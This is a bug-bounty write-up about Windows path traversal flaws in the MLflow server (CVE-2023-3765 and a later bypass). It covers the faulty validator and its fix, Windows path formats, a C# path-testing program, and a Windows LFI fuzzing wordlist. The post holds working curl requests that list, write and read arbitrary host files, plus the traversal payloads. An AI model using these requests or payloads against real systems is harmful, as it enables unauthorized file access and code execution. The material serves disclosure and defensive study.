Testing LFI in Windows: How I (never) got a $30000 bounty
Intro
At the very start of the ML hype, I decided to look at some open-source bug bounty programs on the huntr.com platform. I ended up choosing the MLFlow program, as it had some interesting bugs in the past and a ginormous code base. That is how this whole story started.
The original bug
The repository has a sad history with LFIs, so I decided to focus on them specifically.
Initial analysis
It wasn’t long before I landed at the validate_path_is_safe() helper that was used all over the MLFlow server to prevent the path traversal:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
_OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
...
def validate_path_is_safe(path):
"""
Validates that the specified path is safe to join with a trusted prefix. This is a security
measure to prevent path traversal attacks.
"""
if (
any((s in path) for s in _OS_ALT_SEPS)
or ".." in path.split(posixpath.sep)
or posixpath.isabs(path)
):
raise MlflowException(f"Invalid path: {path}", error_code=INVALID_PARAMETER_VALUE)
The function performs the following checks:
- Checks if any directory separators other than
/are in the path (e.g.\in Windows) - Splits the path by
/and checks for any parent directory traversals.. - Checks if the path is an absolute Posix path (starts with
/)
If any of the criteria is met, the path is rejected.
It looks good on the surface, but have you spotted the bug already? Keep in mind that this code should work on both Windows and Unix machines!
The answer is — the developers forgot to account for absolute Windows paths. Any absolute Windows path with forward slashes / directory separators will fulfill these conditions just fine!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Python 3.9.6 on Windows 10 Pro x64 Build 19045
>>> import os
>>> import posixpath
>>> test_path = 'C:/some/abs/path'
>>>
>>> _OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
>>>
>>> any((s in test_path) for s in _OS_ALT_SEPS)
False
>>> ".." in test_path.split(posixpath.sep)
False
>>> posixpath.isabs(test_path)
False
Thus, we can bypass this check and perform the path traversal. But what is the impact?
Impact
Oh boy, there is some impact! We can read, write, and list arbitrary files by traversing the disk. This essentially gives an attacker full File Explorer-like control over the system, and we can easily overwrite MLFlow Python files or any other user-owned scripts/executables with our own to achieve an RCE.
Listing files
Method 1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
# CURL request: curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/artifacts/list?run_uuid=POC_RUN_ID&path=C:/" # Response: { "root_uri": "file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/shap/mlruns/0/POC_RUN_ID/artifacts", "files": [ { "path": "../../../../../../../../../..", "is_dir": true }, { "path": "../../../../../../../../../../../Program Files", "is_dir": true }, { "path": "../../../../../../../../../../../Windows", "is_dir": true }, ... ] }
Method 2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
# CURL request: curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/" # Response: { "files": [ { "path": "..", "is_dir": true }, ... { "path": "Program Files", "is_dir": true }, { "path": "Program Files (x86)", "is_dir": true }, { "path": "ProgramData", "is_dir": true }, { "path": "Recovery", "is_dir": true }, { "path": "System Volume Information", "is_dir": true } ] }
Writing files
1 2 3 4 5
# CURL request: curl -X 'PUT' -d 'this is write poc' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt" # Response: {}
Reading files
Method 1
1 2 3 4 5
# CURL request: curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/get-artifact?path=C:/temp/poc.txt&run_uuid=POC_RUN_ID" # Response: this is write poc
Method 2
1 2 3 4 5
# CURL request: curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/model-versions/get-artifact?path=C:/Temp/poc.txt&run_uuid=POC_RUN_ID&name=POC_MODEL_NAME&version=1" # Response: this is write poc
You can view the full write-up on the huntr.com platform here.
This bug was assigned a CVE-2023-3765 with a perfect 10.0 score ;) And a 0$ bounty, since, at that time, the project did not have a budget for it.
The fix
After an internal discussion with the MLFlow developers (I love you, guys!), we’ve created the following fix pull request.
The updated code for the validator looks like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def validate_path_is_safe(path):
"""
Validates that the specified path is safe to join with a trusted prefix. This is a security
measure to prevent path traversal attacks.
A valid path should:
not contain separators other than '/'
not contain .. to navigate to parent dir in path
not be an absolute path
"""
if is_file_uri(path):
path = local_file_uri_to_path(path)
if (
any((s in path) for s in _OS_ALT_SEPS)
or ".." in path.split("/")
or pathlib.PureWindowsPath(path).is_absolute()
or pathlib.PurePosixPath(path).is_absolute()
):
raise MlflowException(f"Invalid path: {path}", error_code=INVALID_PARAMETER_VALUE)
OK, we now explicitly check for absolute Windows and Posix paths in the validator. We should be safe, right? Right?
Haxatron’s $30000 bypass
Wrong! Only a month later, after the public disclosure of my bug, a hunter Haxatron found a curious bypass of the fix above and was awarded a whopping sum of $30000 for it!!!!
I stumbled over this report a couple of weeks ago when I wanted to share my original BB report with a friend.
My face was one of a hamster’s at the top of this page… Apparently, I should’ve waited a couple of months with my submission ._.
Well, I can’t predict the future :D So let’s just focus on the bypass CVE-2023-6015, since it contains some really interesting techniques that could help to educate us all!
If you don’t know what starting a path on Windows with C: does, basically if a path starts with C: on Windows then we treat is such that we remove the drive letter and colon from the beginning. For instance a path
C:../.ssh/id_rsawill get converted to../.ssh/id_rsa. As such we can break out of the root dirrectory up to 1 layer.
WTF is this path? How it could be valid? I have literally never seen this path format. That needs some research.
Weird world of Windows paths
Yeah. Did you know that there are like 4 separate ways to construct an absolute path and 3 ways to create a relative one? I did not!
This wonderful research by Erik Jälevik really shines light on this whole mess. Based on the article, we can point out the following path formats. You can also view the explanation of this monstrosity in the official MSDN documentation here.
Supported absolute path formats
C:\path\to\file— your good old absolute drive path\\.\C:\path\to\file— device absolute path\\?\C:\path\to\file— device absolute path (will not be normalized; see Normalization section below)\\localhost\C$\path\to\file— UNC drive share absolute path
Supported relative path formats
..\..\..\path\to\file— completely normal and sane relative path\path\to\file— “current drive relative” path. Who the fuck created this shit? This is basically an absolute path on a current selected drive (i.e. if C disk is used, it will be identical toC:\path\to\file). Who needs this stuff??? It can be so easily confused with Posix paths!C:..\..\..\path\to\file— “current drive folder relative” path. This is the one used in the bypass writeup! And, yet again, Windows supports an almost cryptic path format that should not exist. If your current directory isC:\Users\User, this path will be identical toC:\Users\User\..\..\..\path\to\file. Since it is considered “relative”, it bypassed thepathlibcheck in the original fix.
Canonicalization of alternative separators
Of course, Windows also supports forward slashes as directory separators, so paths like //localhost/C$/path/to/file will also work just fine.
In fact, any forward slashes / are simply replaced internally with back slashes \.
Any repeating instances of separators are then replaced with a single one.
Normalization
Each path that does not start with \\?\ also goes through the normalization process:
- The current directory is prepended to relative paths
- Directory separators are canonicalized
- Relative directory components (
.for the current directory and..for the parent directory) are evaluated - Any trailing whitespaces (
0x20) and dots (0x2e) are removed.
Compiling every bit together
Have I broken your mind already? Not so fast!
We can chain all those Windows path rules to make batshit insane paths like \/127.0.0.1\C$/Windows///////\system32/drivers//////\etc/hosts....... possible.
Do not believe me? See for yourself! Just run this code below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
using System;
using System.IO;
class Program
{
static string[] paths =
{
"\\/127.0.0.1\\C$/Windows///////\\system32/drivers//////\\etc/hosts....... ",
"//./C:/Windows/system32/drivers/etc/hosts",
"\\/./C:/Windows/system32/drivers/etc/hosts",
"/\\./C:/Windows/system32/drivers/etc/hosts",
"\\\\.\\C:\\Windows\\system32\\drivers\\etc\\hosts",
"\\/.\\C:\\Windows\\system32\\drivers\\etc\\hosts",
"/\\.\\C:\\Windows\\system32\\drivers\\etc\\hosts",
"//./C:/Windows/system32/drivers/etc/hosts.",
"\\/./C:/Windows/system32/drivers/etc/hosts.",
"/\\./C:/Windows/system32/drivers/etc/hosts.",
"\\\\.\\C:\\Windows\\system32\\drivers\\etc\\hosts.",
"\\/.\\C:\\Windows\\system32\\drivers\\etc\\hosts.",
"/\\.\\C:\\Windows\\system32\\drivers\\etc\\hosts.",
"\\\\?\\C:\\Windows\\system32\\drivers\\etc\\hosts",
"\\/?\\C:\\Windows\\system32\\drivers\\etc\\hosts",
"/\\?\\C:\\Windows\\system32\\drivers\\etc\\hosts",
"//?/C:/Windows/system32/drivers/etc/hosts",
"\\/?/C:/Windows/system32/drivers/etc/hosts",
"/\\?/C:/Windows/system32/drivers/etc/hosts",
"\\\\localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts",
"\\/localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts",
"/\\localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts",
"//localhost/C$/Windows/system32/drivers/etc/hosts",
"\\/localhost/C$/Windows/system32/drivers/etc/hosts",
"/\\localhost/C$/Windows/system32/drivers/etc/hosts",
"\\\\localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
"\\/localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
"/\\localhost\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
"//localhost/C$/Windows/system32/drivers/etc/hosts.",
"\\/localhost/C$/Windows/system32/drivers/etc/hosts.",
"/\\localhost/C$/Windows/system32/drivers/etc/hosts.",
"\\\\127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
"\\/127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
"/\\127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
"//127.0.0.1/C$/Windows/system32/drivers/etc/hosts",
"\\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts",
"/\\127.0.0.1/C$/Windows/system32/drivers/etc/hosts",
"\\\\127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
"\\/127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
"/\\127.0.0.1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
"//127.0.0.1/C$/Windows/system32/drivers/etc/hosts.",
"\\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts.",
"/\\127.0.0.1/C$/Windows/system32/drivers/etc/hosts.",
"//::1/C$/Windows/system32/drivers/etc/hosts",
"\\/::1/C$/Windows/system32/drivers/etc/hosts",
"/\\::1/C$/Windows/system32/drivers/etc/hosts",
"\\\\::1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
"\\/::1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
"/\\::1\\C$\\Windows\\system32\\drivers\\etc\\hosts",
"//::1/C$/Windows/system32/drivers/etc/hosts.",
"\\/::1/C$/Windows/system32/drivers/etc/hosts.",
"/\\::1/C$/Windows/system32/drivers/etc/hosts.",
"\\\\::1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
"\\/::1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
"/\\::1\\C$\\Windows\\system32\\drivers\\etc\\hosts.",
"C:..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"C:..\\Windows\\system32\\drivers\\etc\\hosts",
"C:../../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
"C:../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
"C:../../../../../../../../../../Windows/system32/drivers/etc/hosts",
"C:../../../../../../../../../Windows/system32/drivers/etc/hosts",
"C:../../../../../../../../Windows/system32/drivers/etc/hosts",
"C:../../../../../../../Windows/system32/drivers/etc/hosts",
"C:../../../../../../Windows/system32/drivers/etc/hosts",
"C:../../../../../Windows/system32/drivers/etc/hosts",
"C:../../../../Windows/system32/drivers/etc/hosts",
"C:../../../Windows/system32/drivers/etc/hosts",
"C:../../Windows/system32/drivers/etc/hosts",
"C:../Windows/system32/drivers/etc/hosts",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\Windows\\system32\\drivers\\etc\\hosts",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\..\\Windows\\system32\\drivers\\etc\\hosts.",
"..\\Windows\\system32\\drivers\\etc\\hosts.",
"../../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
"../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
"../../../../../../../../../../Windows/system32/drivers/etc/hosts",
"../../../../../../../../../Windows/system32/drivers/etc/hosts",
"../../../../../../../../Windows/system32/drivers/etc/hosts",
"../../../../../../../Windows/system32/drivers/etc/hosts",
"../../../../../../Windows/system32/drivers/etc/qhosts",
"../../../../../Windows/system32/drivers/etc/hosts",
"../../../../Windows/system32/drivers/etc/hosts",
"../../../Windows/system32/drivers/etc/hosts",
"../../Windows/system32/drivers/etc/hosts",
"../Windows/system32/drivers/etc/hosts",
"../../../../../../../../../../../../Windows/system32/drivers/etc/hosts.",
"../../../../../../../../../../../Windows/system32/drivers/etc/hosts.",
"../../../../../../../../../../Windows/system32/drivers/etc/hosts.",
"../../../../../../../../../Windows/system32/drivers/etc/hosts.",
"../../../../../../../../Windows/system32/drivers/etc/hosts.",
"../../../../../../../Windows/system32/drivers/etc/hosts.",
"../../../../../../Windows/system32/drivers/etc/qhosts.",
"../../../../../Windows/system32/drivers/etc/hosts.",
"../../../../Windows/system32/drivers/etc/hosts.",
"../../../Windows/system32/drivers/etc/hosts.",
"../../Windows/system32/drivers/etc/hosts.",
"../Windows/system32/drivers/etc/hosts.",
"../..\\../..\\../..\\../..\\../..\\../..\\Windows/system32\\drivers/etc\\hosts",
"../..\\../..\\../..\\../..\\../..\\..\\Windows/system32\\drivers/etc\\hosts",
"../..\\../..\\../..\\../..\\../..\\Windows/system32\\drivers/etc\\hosts",
"../..\\../..\\../..\\../..\\..\\Windows/system32\\drivers/etc\\hosts",
"../..\\../..\\../..\\../..\\Windows/system32\\drivers/etc\\hosts",
"../..\\../..\\../..\\..\\Windows/system32\\drivers/etc\\hosts",
"../..\\../..\\../..\\Windows/system32\\drivers/etc\\hosts",
"../..\\../..\\..\\Windows/system32\\drivers/etc\\hosts",
"../..\\../..\\Windows/system32\\drivers/etc\\hosts",
"../..\\..\\Windows/system32\\drivers/etc\\hosts",
"../..\\Windows/system32\\drivers/etc\\hosts",
"../\\Windows/system32\\drivers/etc\\hosts",
"RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR..\\Windows\\system32\\drivers\\etc\\hosts",
"RANDOMDIR../../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../../../../../../../../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../../../../../../../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../../../../../../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../../../../../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../../../../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../../../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../../Windows/system32/drivers/etc/hosts",
"RANDOMDIR../Windows/system32/drivers/etc/hosts",
"C:/Windows/system32/drivers/etc/hosts",
"C:\\Windows\\system32\\drivers\\etc\\hosts",
"C:/Windows/system32/drivers/etc/hosts.",
"C:\\Windows\\system32\\drivers\\etc\\hosts."
};
static void Main(string[] args)
{
foreach(string path in paths)
{
try
{
// Check if the file exists
if (File.Exists(path))
{
// Read the contents of the file
string fileContent = File.ReadAllText(path);
Console.WriteLine($"[+] Path: {path}");
}
else
{
Console.WriteLine($"[-] Path: {path}");
}
}
catch (Exception)
{
Console.WriteLine($"Path error: {path}");
}
}
}
}
Every path in the list will return a valid result!
Windows LFI Wordlist
We are now ready to apply our newly gathered knowledge to create an unconventional list of Windows paths that can be used to fuzz for LFI. Which can be found below. I have also submitted it to the SecLists repository to make it accessible to a wider circle of security folk :)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
\/127.0.0.1\C$/Windows///////\system32/drivers//////\etc/hosts.......
//./C:/Windows/system32/drivers/etc/hosts
\/./C:/Windows/system32/drivers/etc/hosts
/\./C:/Windows/system32/drivers/etc/hosts
\\.\C:\Windows\system32\drivers\etc\hosts
\/.\C:\Windows\system32\drivers\etc\hosts
/\.\C:\Windows\system32\drivers\etc\hosts
//./C:/Windows/system32/drivers/etc/hosts.
\/./C:/Windows/system32/drivers/etc/hosts.
/\./C:/Windows/system32/drivers/etc/hosts.
\\.\C:\Windows\system32\drivers\etc\hosts.
\/.\C:\Windows\system32\drivers\etc\hosts.
/\.\C:\Windows\system32\drivers\etc\hosts.
\\?\C:\Windows\system32\drivers\etc\hosts
\/?\C:\Windows\system32\drivers\etc\hosts
/\?\C:\Windows\system32\drivers\etc\hosts
//?/C:/Windows/system32/drivers/etc/hosts
\/?/C:/Windows/system32/drivers/etc/hosts
/\?/C:/Windows/system32/drivers/etc/hosts
\\localhost\C$\Windows\system32\drivers\etc\hosts
\/localhost\C$\Windows\system32\drivers\etc\hosts
/\localhost\C$\Windows\system32\drivers\etc\hosts
//localhost/C$/Windows/system32/drivers/etc/hosts
\/localhost/C$/Windows/system32/drivers/etc/hosts
/\localhost/C$/Windows/system32/drivers/etc/hosts
\\localhost\C$\Windows\system32\drivers\etc\hosts.
\/localhost\C$\Windows\system32\drivers\etc\hosts.
/\localhost\C$\Windows\system32\drivers\etc\hosts.
//localhost/C$/Windows/system32/drivers/etc/hosts.
\/localhost/C$/Windows/system32/drivers/etc/hosts.
/\localhost/C$/Windows/system32/drivers/etc/hosts.
\\127.0.0.1\C$\Windows\system32\drivers\etc\hosts
\/127.0.0.1\C$\Windows\system32\drivers\etc\hosts
/\127.0.0.1\C$\Windows\system32\drivers\etc\hosts
//127.0.0.1/C$/Windows/system32/drivers/etc/hosts
\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts
/\127.0.0.1/C$/Windows/system32/drivers/etc/hosts
\\127.0.0.1\C$\Windows\system32\drivers\etc\hosts.
\/127.0.0.1\C$\Windows\system32\drivers\etc\hosts.
/\127.0.0.1\C$\Windows\system32\drivers\etc\hosts.
//127.0.0.1/C$/Windows/system32/drivers/etc/hosts.
\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts.
/\127.0.0.1/C$/Windows/system32/drivers/etc/hosts.
//::1/C$/Windows/system32/drivers/etc/hosts
\/::1/C$/Windows/system32/drivers/etc/hosts
/\::1/C$/Windows/system32/drivers/etc/hosts
\\::1\C$\Windows\system32\drivers\etc\hosts
\/::1\C$\Windows\system32\drivers\etc\hosts
/\::1\C$\Windows\system32\drivers\etc\hosts
//::1/C$/Windows/system32/drivers/etc/hosts.
\/::1/C$/Windows/system32/drivers/etc/hosts.
/\::1/C$/Windows/system32/drivers/etc/hosts.
\\::1\C$\Windows\system32\drivers\etc\hosts.
\/::1\C$\Windows\system32\drivers\etc\hosts.
/\::1\C$\Windows\system32\drivers\etc\hosts.
C:..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\..\Windows\system32\drivers\etc\hosts
C:..\..\Windows\system32\drivers\etc\hosts
C:..\Windows\system32\drivers\etc\hosts
C:../../../../../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../../Windows/system32/drivers/etc/hosts
C:../../../../../Windows/system32/drivers/etc/hosts
C:../../../../Windows/system32/drivers/etc/hosts
C:../../../Windows/system32/drivers/etc/hosts
C:../../Windows/system32/drivers/etc/hosts
C:../Windows/system32/drivers/etc/hosts
..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\..\Windows\system32\drivers\etc\hosts
..\..\..\Windows\system32\drivers\etc\hosts
..\..\Windows\system32\drivers\etc\hosts
..\Windows\system32\drivers\etc\hosts
..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\..\Windows\system32\drivers\etc\hosts.
..\..\..\Windows\system32\drivers\etc\hosts.
..\..\Windows\system32\drivers\etc\hosts.
..\Windows\system32\drivers\etc\hosts.
../../../../../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../../Windows/system32/drivers/etc/hosts
../../../../../../Windows/system32/drivers/etc/hosts
../../../../../Windows/system32/drivers/etc/hosts
../../../../Windows/system32/drivers/etc/hosts
../../../Windows/system32/drivers/etc/hosts
../../Windows/system32/drivers/etc/hosts
../Windows/system32/drivers/etc/hosts
../../../../../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../../Windows/system32/drivers/etc/hosts.
../../../../../../Windows/system32/drivers/etc/qhosts.
../../../../../Windows/system32/drivers/etc/hosts.
../../../../Windows/system32/drivers/etc/hosts.
../../../Windows/system32/drivers/etc/hosts.
../../Windows/system32/drivers/etc/hosts.
../Windows/system32/drivers/etc/hosts.
../..\../..\../..\../..\../..\../..\Windows/system32\drivers/etc\hosts
../..\../..\../..\../..\../..\..\Windows/system32\drivers/etc\hosts
../..\../..\../..\../..\../..\Windows/system32\drivers/etc\hosts
../..\../..\../..\../..\..\Windows/system32\drivers/etc\hosts
../..\../..\../..\../..\Windows/system32\drivers/etc\hosts
../..\../..\../..\..\Windows/system32\drivers/etc\hosts
../..\../..\../..\Windows/system32\drivers/etc\hosts
../..\../..\..\Windows/system32\drivers/etc\hosts
../..\../..\Windows/system32\drivers/etc\hosts
../..\..\Windows/system32\drivers/etc\hosts
../..\Windows/system32\drivers/etc\hosts
../\Windows/system32\drivers/etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\..\Windows\system32\drivers\etc\hosts
RANDOMDIR..\Windows\system32\drivers\etc\hosts
